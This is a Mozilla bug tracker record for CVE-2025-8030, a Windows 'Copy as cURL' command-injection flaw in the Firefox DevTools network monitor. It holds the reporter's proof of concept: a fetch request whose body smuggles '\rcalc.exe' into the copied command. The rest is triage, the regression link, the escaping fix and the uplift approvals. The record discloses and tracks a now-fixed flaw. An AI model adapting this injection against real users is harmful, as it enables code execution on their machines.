Closed Bug 1968414 (CVE-2025-8030) Opened 9 months ago Closed 8 months ago

Copy As Curl[Windows] - Code Execution [Return ie \r in request body]

Categories

(DevTools :: Netmonitor, defect, P2)

Product:
DevTools
Component:
Netmonitor
Type:
defect

Tracking

(firefox-esr115 wontfix, firefox-esr128141+ fixed, firefox-esr140141+ fixed, firefox139 wontfix, firefox140 wontfix, firefox141+ fixed, firefox142+ fixed)

Status:
RESOLVED FIXED
Milestone:
142 Branch
Tracking Flags:
Tracking Status
firefox-esr115 --- wontfix
firefox-esr128 141+ fixed
firefox-esr140 141+ fixed
firefox139 --- wontfix
firefox140 --- wontfix
firefox141 + fixed
firefox142 + fixed

People

(Reporter: ameenbasha111, Assigned: bomsy)

References

(Blocks 1 open bug, Regression)

Details

(Keywords: regression, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main141+][adv-ESR140.1+][adv-ESR128.13+])

Attachments

(4 files, 4 obsolete files)

[Firefox] CopyAsCurl(windows)-Return.mp4
2.20 MB, video/mp4
Details
(secure)
48 bytes, text/x-phabricator-request
Details | Review
(secure)
48 bytes, text/x-phabricator-request
phab-bot
: approval-mozilla-beta+
Details | Review
advisory.txt
216 bytes, text/plain
Details

HI Team, Firefox nightly latest on windows vulnerable for code execution via copy as curl (windows) which allows the attacker to execute code on victims machine

Tested in Nightly Latest 140.0a1 (2025-05-24) (64-bit)

fetch("/", {
"credentials": "omit",
"headers": {
"Accept-Language": "en-US",
"Content-Type": "text/plain",
},
"body": "\rcalc.exe \r",
"method": "POST",
});

Steps to reproduce

  1. Send the above request directly via console (or) embed it in html
  2. Now from network tab copy the request as curl (windows)
  3. paste it in cmd and you can find the calc popup

rootcause \r wasn't filtered properly

I have reported the same to chrome and the issue was fixed now i have attached the changeset below, we can adopt the same here too
https://chromium-review.googlesource.com/c/devtools/devtools-frontend/+/6573473/2/front_end/panels/network/NetworkLogView.ts

I have attached the poc video for reference

Flags: sec-bounty?
Component: Security → Netmonitor
Product: Firefox → DevTools
See Also: → 1950001
Summary: Copy As Curl[Windows] - Code Execution [Return] → Copy As Curl[Windows] - Code Execution [Return ie \r instead of \r\n or \n in request body]
Summary: Copy As Curl[Windows] - Code Execution [Return ie \r instead of \r\n or \n in request body] → Copy As Curl[Windows] - Code Execution [Return ie \r in request body]

Nicolas can you check if it's a regression from the recent fix on this feature?

Severity: -- → S3
Flags: needinfo?(nchevobbe)
Priority: -- → P2

(In reply to Julian Descottes [:jdescottes] from comment #1)

Nicolas can you check if it's a regression from the recent fix on this feature?

regressed by Bug 1950001

Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(nchevobbe)
Keywords: regression
Regressed by: 1950001

Set release status flags based on info from the regressing bug 1950001

:bomsy, since you are the author of the regressor, bug 1950001, could you take a look?

For more information, please visit BugBot documentation.

status-firefox139: --- → affected
status-firefox140: --- → affected
status-firefox141: --- → affected
status-firefox-esr128: --- → affected
Flags: needinfo?(hmanilla)
Keywords: sec-moderate
Comment 3 is private: false
See Also: 1950001

Hi :bomsy can you look into this case? i have shared the chrome changeset for this issue in the description.

Hi Bomsy Friendly Ping, Any update on this case.

Attached file (secure)
Assignee: nobody → hmanilla
Status: NEW → ASSIGNED
Attachment #9495695 - Attachment description: Bug 1968414 - [devtools] Escape carraige return character properly r=#devtools → Bug 1968414 - [devtools] Escape carriage return character properly r=#devtools
Flags: needinfo?(hmanilla)

Team any update on this case?

Seems the fix is accepted, can we move this issue to closed team

Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/5dca7e838a6d https://hg.mozilla.org/integration/autoland/rev/77c894b3f3b8 [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe
Pushed by agoloman@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/f87e4f401557 https://hg.mozilla.org/integration/autoland/rev/5649df61eae0 Revert "Bug 1968414 - [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe" for causing dt failures @browser_net_curl-utils.js.

Backed out for causing dt failures @browser_net_curl-utils.js.

Flags: needinfo?(hmanilla)
Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/4e38ca024e12 https://hg.mozilla.org/integration/autoland/rev/c2a657f761cb [devtools] Escape carriage return character properly r=devtools-reviewers,nchevobbe
Flags: needinfo?(hmanilla)

https://hg.mozilla.org/mozilla-central/rev/c2a657f761cb

Group: firefox-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 8 months ago
status-firefox142: --- → fixed
Resolution: --- → FIXED
Target Milestone: --- → 142 Branch

The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?

For more information, please visit BugBot documentation.

Flags: needinfo?(hmanilla)
Flags: sec-bounty? → sec-bounty+
See Also: → https://issues.chromium.org/issues/406631048
Attachment #9498571 - Flags: approval-mozilla-beta?

firefox-beta Uplift Approval Request

  • User impact if declined: Broken escape of the curl on windows command
  • Code covered by automated testing: yes
  • Fix verified in Nightly: yes
  • Needs manual QE test: no
  • Steps to reproduce for manual QE testing: None
  • Risk associated with taking this patch: small js fix
  • Explanation of risk level: Low risk
  • String changes made/needed: None
  • Is Android affected?: no
Flags: needinfo?(hmanilla)

Bomsy, we will need uplift requests for ESR branches as well, thanks.

Flags: needinfo?(hmanilla)
Attached file (secure) (obsolete) —

Original Revision: https://phabricator.services.mozilla.com/D254323

Attachment #9498795 - Flags: approval-mozilla-esr140?
Attached file (secure) (obsolete) —

Original Revision: https://phabricator.services.mozilla.com/D254323

Attachment #9498797 - Flags: approval-mozilla-esr128?
Flags: needinfo?(hmanilla)
Attachment #9498571 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #9498795 - Flags: approval-mozilla-esr140? → approval-mozilla-esr140+
Attachment #9498797 - Flags: approval-mozilla-esr128? → approval-mozilla-esr128+
QA Whiteboard: [sec] [qa-triage-done-c142/b141]
Flags: qe-verify-
Whiteboard: [client-bounty-form] → [client-bounty-form][adv-main141+]
Blocks: curl
Whiteboard: [client-bounty-form][adv-main141+] → [client-bounty-form][adv-main141+][adv-ESR128.13+]
Whiteboard: [client-bounty-form][adv-main141+][adv-ESR128.13+] → [client-bounty-form][adv-main141+][adv-ESR140.1+][adv-ESR128.13+]
Attached file advisory.txt (obsolete) —
Attached file advisory.txt (obsolete) —
Attachment #9500511 - Attachment is obsolete: true
Attached file advisory.txt
Attachment #9500512 - Attachment is obsolete: true
Attachment #9495695 - Attachment description: Bug 1968414 - [devtools] Escape carriage return character properly r=#devtools → (secure)
Alias: CVE-2025-8030
Attachment #9498795 - Attachment is obsolete: true
Attachment #9498797 - Attachment is obsolete: true
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: